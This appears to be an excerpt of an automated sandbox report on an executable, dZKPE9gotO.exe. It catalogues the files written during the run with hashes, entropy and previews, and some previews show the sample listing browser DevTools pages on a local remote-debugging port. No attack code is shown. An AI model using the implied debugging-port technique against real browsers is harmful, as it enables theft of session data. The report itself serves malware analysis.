                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):45862
                                                                                                                                                                                                                                                Entropy (8bit):6.086781055868148
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:KMkbJrT8IeQc5day2KKGf4oBauetCPjU7xPQ2CioG7DRo+yM/42cRaLMos79:KMk1rT8H1aas1FoG7VLyMV/YosR
                                                                                                                                                                                                                                                MD5:0F3E8864A37C31DA6055B14DE10F6724
                                                                                                                                                                                                                                                SHA1:2C394661D27E3EDC173CDE74538131E7141BCE98
                                                                                                                                                                                                                                                SHA-256:FC1791B215777677326B30D11706BEBE3FF10A8240C2B23C3898772748642F9A
                                                                                                                                                                                                                                                SHA-512:8EDDB610F773393EE7AFBF20F9FD139BAB39EA63C641D5DC9D0A6A1BA3344DA24CF1FCF9E210587B5E7E209970544CDAADDF4AAD14DC334DEB532539CFA1FAEF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"cac4bf85-0420-4f2d-9460-404987ed9f05"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734365252"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):45909
                                                                                                                                                                                                                                                Entropy (8bit):6.086511297531517
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:KMkbJrT8IeQc5daX2KKGf4oBauetCPjU7xPQ2CioG7DRo+yM/42cRaLMos79:KMk1rT8H1ahs1FoG7VLyMV/YosR
                                                                                                                                                                                                                                                MD5:2C906FD2872754528EDA500ABA847671
                                                                                                                                                                                                                                                SHA1:C3D5EBB841869B548230297374CC8C90AF4F0FCC
                                                                                                                                                                                                                                                SHA-256:618AA79097C7D94AEEA4B3E2E1757C976698BDB5E5ED8641F04936FDA93010E5
                                                                                                                                                                                                                                                SHA-512:797EBBD39C6BC85CE22E03588FA5556F218C20F62205000D3B4DBFE80381C5AD84261C67E5E2954125346888A0BFA19725E7520211AB88B40A8533FA92B4188F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"cac4bf85-0420-4f2d-9460-404987ed9f05"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734365252"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):45986
                                                                                                                                                                                                                                                Entropy (8bit):6.086445397258186
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:KMkbJrT8IeQc5maX2KKGf4oYauetCPjU7xPQ2CioG7DRo+yM/42cRaLMos79:KMk1rT8H+ass1FoG7VLyMV/YosR
                                                                                                                                                                                                                                                MD5:D2AD5D749BFCFEDB9FF8F3C9C68872F0
                                                                                                                                                                                                                                                SHA1:DA057ECB81B0BE5BEECF84C8C395D2BA0001FD0C
                                                                                                                                                                                                                                                SHA-256:F4EE99E1C2B445C114368CCE70705B0B050EA03D38A120F3EC59625837EB454A
                                                                                                                                                                                                                                                SHA-512:B94A77BC460376AC5000B9FA5E16F7CB05754341F8FA67CC53DDF2407591DB9B5167F796EFC74CFFA27C24F3792090870955C5C475A3A9CC08650D07611122DE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"cac4bf85-0420-4f2d-9460-404987ed9f05"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734365252"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                Entropy (8bit):3.848888920200425
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxSxl9Il8u02UnnZKiTxBHm/DnhW6LZfjSR0Kzd1rc:mLYC2UnZKiTxBHqnhW6tjSyKU
                                                                                                                                                                                                                                                MD5:59211C5B11856C30F4C6901AC4AAD129
                                                                                                                                                                                                                                                SHA1:85DF2B3AB942538FE9374FBC8DE64FF11E2BE695
                                                                                                                                                                                                                                                SHA-256:8835AE7EB4B7A1C6B7B9019484203078C43DF6EF49FECA9523FF386AD3C84CFB
                                                                                                                                                                                                                                                SHA-512:7134433BE7046C051205E7E6E83C2025A09CCE0D1DA317CBD0076A403A34062F8D9A008DB4D3361C77BC60FDBD16E9A72085FB60F30E598165B45EA8FB2C7DF3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.V.h./.d.x.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.j.D.6.A.p.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                Entropy (8bit):3.9952288911131153
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:KYC2Uvlw0Z0+XF91OskdEcu+BPgbSfwJerjuBBUFxyXUE6QluGkE92:KOOGqnOVdEcpBobSzjWBnluU92
                                                                                                                                                                                                                                                MD5:D5C641A2CFADBA7B127CC4BEDE34506D
                                                                                                                                                                                                                                                SHA1:007D652A3FB950A511B89E54E8C332FD834BC51C
                                                                                                                                                                                                                                                SHA-256:5F539713CDAA31B7F237BC1868BDB463ABFD13EE89281C3CBDBE6497A9A54EBD
                                                                                                                                                                                                                                                SHA-512:62132888C2AA4B1D81275D5BA519D78200EDCAD435E181A63B9A7542FB3E06A49D07F436C26F8D83CA3144E2CCB1A16C84BFF2167049D78FDF277BFD234DD6E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.I.U.o.4.9.R.P.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.j.D.6.A.p.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                Entropy (8bit):3.899270617919726
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xXxl9Il8u02UmbEZrUjP9AsJll+wcuuQsPMrFFMd/vc:aZYC2Umb5P9PlltcuuQsUxFl
                                                                                                                                                                                                                                                MD5:3E85C609F9AEEF7A10B2F3C23B7B9B33
                                                                                                                                                                                                                                                SHA1:B8BFEC38DB4DAA2A578A7E9331A0D60B23919E70
                                                                                                                                                                                                                                                SHA-256:EFADFB1F6BC8019D10655CCCD1FC998088F7999244A3D3E717780CD1AB7B152F
                                                                                                                                                                                                                                                SHA-512:6F365DC9BBCE2625F6A8333C6C71C7EFC2F03CF5406CA77D54FFF8A73BD4EC6B0E1B870A71B5B6072E3962FDBBA7E97BE9AD9205D22E9369217A359B37FCD2D8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.h.+.j.E.6.Z.u.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.W.j.D.6.A.p.
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                Entropy (8bit):5.396854063373938
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:6NnCiHCXNnCHXGXpbCHXYNnCI9ClNnCRdgEC0NnCMCTNnCYDCENnCwwCZNnCNaMX:6NUN5NINavN4N/xN5bNga1s
                                                                                                                                                                                                                                                MD5:B441A47D7F4DA8C6E94E6077433114C4
                                                                                                                                                                                                                                                SHA1:99CF80163D3AE4C5AFD10D6D13CDFCEBCFEF933B
                                                                                                                                                                                                                                                SHA-256:1FD19A7029EAE9FB898A459E55F5BA9C842F717FF8A0FE9A4AF16769562AF4F7
                                                                                                                                                                                                                                                SHA-512:E05344AFA1717F22A73A86F142BE7ED084F76A83F5F03AD0C7EC36DA5664D220E321A24F3B589E110662CE31B22C1CA65EB4D1EE7C5F5F7D3AA99B0BD0A24D46
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2B26FA0DB920D5CADAE21063D78B7B07",.. "id": "2B26FA0DB920D5CADAE21063D78B7B07",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2B26FA0DB920D5CADAE21063D78B7B07"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1E92E8CCB263AA9B8FDBFF0D18E3743D",.. "id": "1E92E8CCB263AA9B8FDBFF0D18E3743D",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1E92E8CCB263AA9B8FDBFF0D18E3743D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                Entropy (8bit):5.361197464818854
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:SfNaoCGexTECGvfNaoC0CXfNaoC1CyfNaoC4Fr0UrU0U8C4g:6NnCGexTECGHNnC0CPNnC1CaNnCI0Uro
                                                                                                                                                                                                                                                MD5:41D2EB7E98712EC2BEAB1B73EBCB141C
                                                                                                                                                                                                                                                SHA1:2CAC51C5B62B122A29CD613FA88AA72ED21F6719
                                                                                                                                                                                                                                                SHA-256:295E54FB0D6C531E150CE4AF3F820B1ED1423277BEF02475C9C0256C3CB4FE94
                                                                                                                                                                                                                                                SHA-512:B4D26A0088FFCA99C3F903D03683AC2E0F6B73E1090215FA123858F33D555F87ABC52AFF204067888307EF3721F31DCC5E97B1D4B3439D7074E910827FFC29EF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FCBC8A9E25F8621A6CFAD69D1E4361BB",.. "id": "FCBC8A9E25F8621A6CFAD69D1E4361BB",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FCBC8A9E25F8621A6CFAD69D1E4361BB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/06E065402EA3BD539F713313542FA646",.. "id": "06E065402EA3BD539F713313542FA646",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/06E065402EA3BD539F713313542FA646"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1522376
                                                                                                                                                                                                                                                Entropy (8bit):7.991164456308662
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:24576:9hyLLqVMqWYhnSa0FKB83YHj/MsV1wJR0K9/oZaFPu+TQlYEhK2c68ZC2hqYHn4E:byMMqRn2Ki3CQs/RZa16+68Z13nkmGZu
                                                                                                                                                                                                                                                MD5:F1F6044E555C80FA9B361E2F60DBD464
                                                                                                                                                                                                                                                SHA1:A05BF045574DBB076B15E8BA81851FBFFB87FFB5
                                                                                                                                                                                                                                                SHA-256:6F5EB6E2ECD3B203EDFBAC49D1014B21C9C1EFFF980D1D8972FD2687C67E3014
                                                                                                                                                                                                                                                SHA-512:54455BE8CB6B69F6F47492B407234721C22C25BC00CAD69B14FED402B2102D04659C6AB877C43AA4B6D610CF93CB57B3162B5D63E9B7049F967FC596585CE1D4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):76326
                                                                                                                                                                                                                                                Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                Entropy (8bit):5.389527204967788
                                                                                                                                                                                                                                                Encrypted:false
